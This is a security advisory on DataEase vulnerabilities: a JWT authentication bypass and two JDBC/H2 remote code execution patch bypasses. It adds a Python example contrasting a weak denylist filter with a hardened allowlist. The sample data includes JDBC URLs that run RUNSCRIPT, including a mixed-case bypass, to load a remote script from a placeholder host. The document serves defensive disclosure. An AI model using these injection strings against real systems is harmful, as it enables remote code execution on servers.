Advisory

Multiple vulnerabilities reported in DataEase Platform exposing risk of system compromise

Take action: If you are using DataEase, make sure to isolate it from the internet and allow access only from trusted networks. Then plan a quick upgrade to version 2.10.10 or later. There are at least two scary (and fairly dumb) exploits that can compromise your DataEase.


Learn More

DataEase, an open-source business intelligence and data visualization platform, has disclosed multiple security vulnerabilities that enable attackers to achieve system compromise.

Vulnerabilities summary:

  • CVE-2025-49001 (CVSS score 9.8): Authentication Bypass Vulnerability. Due to a flaw in the JWT algorithm implementation, an unauthenticated attacker can forge a JWT token using an arbitrary secret to bypass permission verification and access system backend functions. The flaw allows attackers to craft tokens with arbitrary secrets while keeping the required format containing user ID and organization ID claims. The vulnerability occurs because the authentication verification process continues executing even when token validation fails.
  • CVE-2025-49002 (CVSS score 9.8): Remote Code Execution Bypass Vulnerability. Due to a defect in the CVE-2025-32966 patch, the H2 database module does not strictly filter JDBC connection parameters entered by users, allowing authenticated attackers to bypass the patch using case variations to achieve code execution. Attackers can use variations like "RUnSCRIPT" instead of "RUNSCRIPT" to circumvent the filtering mechanism, enabling them to inject malicious SQL commands that load external scripts containing Spring Framework-based payloads for remote code execution.
  • CVE-2025-48999 (CVSS score 8.8): Remote Code Execution Vulnerability. A flaw in the getUrlType() function allows authenticated attackers to construct malicious JDBC statements that execute arbitrary Java code and gain server privileges by bypassing the CVE-2025-46566 patch. By exploiting flaws in the hostname validation logic, attackers can inject parameters such as socketFactory specifications that trigger the loading of malicious XML configurations, ultimately leading to arbitrary code execution.
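
The CVE-2025-49002 bypass works against a filter that matches keywords case-sensitively. The following is an added illustration written for this advisory, not DataEase's own code: a naive denylist check of the kind described beside a hardened allowlist check that parses and case-folds the H2 URL settings. The allowed setting names and the sample URLs (including the placeholder host) are constructed assumptions.

```python
# Assumed allowlist of H2 URL settings a BI connector legitimately needs.
# Not DataEase's actual configuration; adjust for your deployment.
ALLOWED_KEYS = {"MODE", "DB_CLOSE_DELAY", "IFEXISTS", "CIPHER"}

# Constructed sample JDBC URLs; example.invalid is a placeholder host.
SAMPLE_URLS = {
    "benign":  "jdbc:h2:mem:sales;MODE=MySQL;DB_CLOSE_DELAY=-1",
    "exact":   "jdbc:h2:mem:sales;INIT=RUNSCRIPT FROM 'http://example.invalid/s.sql'",
    "mixed":   "jdbc:h2:mem:sales;init=RUnSCRIPT FROM 'http://example.invalid/s.sql'",
    "unknown": "jdbc:h2:mem:sales;SOME_NEW_SETTING=1",
}


def naive_filter(url: str) -> bool:
    """Weak pattern: a case-sensitive denylist of one keyword.
    Returns True when the URL would be accepted."""
    return "RUNSCRIPT" not in url


def parse_h2_params(url: str) -> dict:
    """Split the settings after the first ';' into an upper-cased key/value map.
    Whitespace is stripped so 'init = ...' and 'INIT=...' collapse to one key."""
    params = {}
    _, _, tail = url.partition(";")
    for part in tail.split(";"):
        if not part.strip():
            continue
        key, _, value = part.partition("=")
        params[key.strip().upper()] = value.strip().upper()
    return params


def hardened_filter(url: str) -> bool:
    """Allowlist check on case-folded settings: any key not explicitly
    permitted (INIT among them) is rejected, so case variation does not help."""
    if not url.lower().startswith("jdbc:h2:"):
        return False
    params = parse_h2_params(url)
    if any(key not in ALLOWED_KEYS for key in params):
        return False
    # Defence in depth: values are already upper-cased, so one comparison suffices.
    return not any("RUNSCRIPT" in value for value in params.values())


if __name__ == "__main__":
    for name, url in SAMPLE_URLS.items():
        print(f"{name:8} naive={naive_filter(url)!s:5} hardened={hardened_filter(url)}")
```

The mixed-case sample passes the naive check and is rejected by the hardened one; the unknown setting is rejected as well, which is the point of allowlisting over denylisting.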

Affected Versions: 

DataEase Community Edition (CE) and Enterprise Edition (EE) versions up to and including 2.10.8 are affected by CVE-2025-49001 and CVE-2025-49002. CVE-2025-48999 affects versions up to and including 2.10.9.

Patched Versions: 

All three vulnerabilities have been addressed in DataEase version 2.10.10 and later releases.

For users who can't patch, mitigation measures include deploying web application firewalls to intercept malicious JDBC payload patterns, restricting outbound network access to prevent external resource connections via JDBC, and limiting access to DataEase instances to prevent exposure to untrusted networks. Organizations should avoid exposing DataEase platforms directly to the public internet whenever possible.
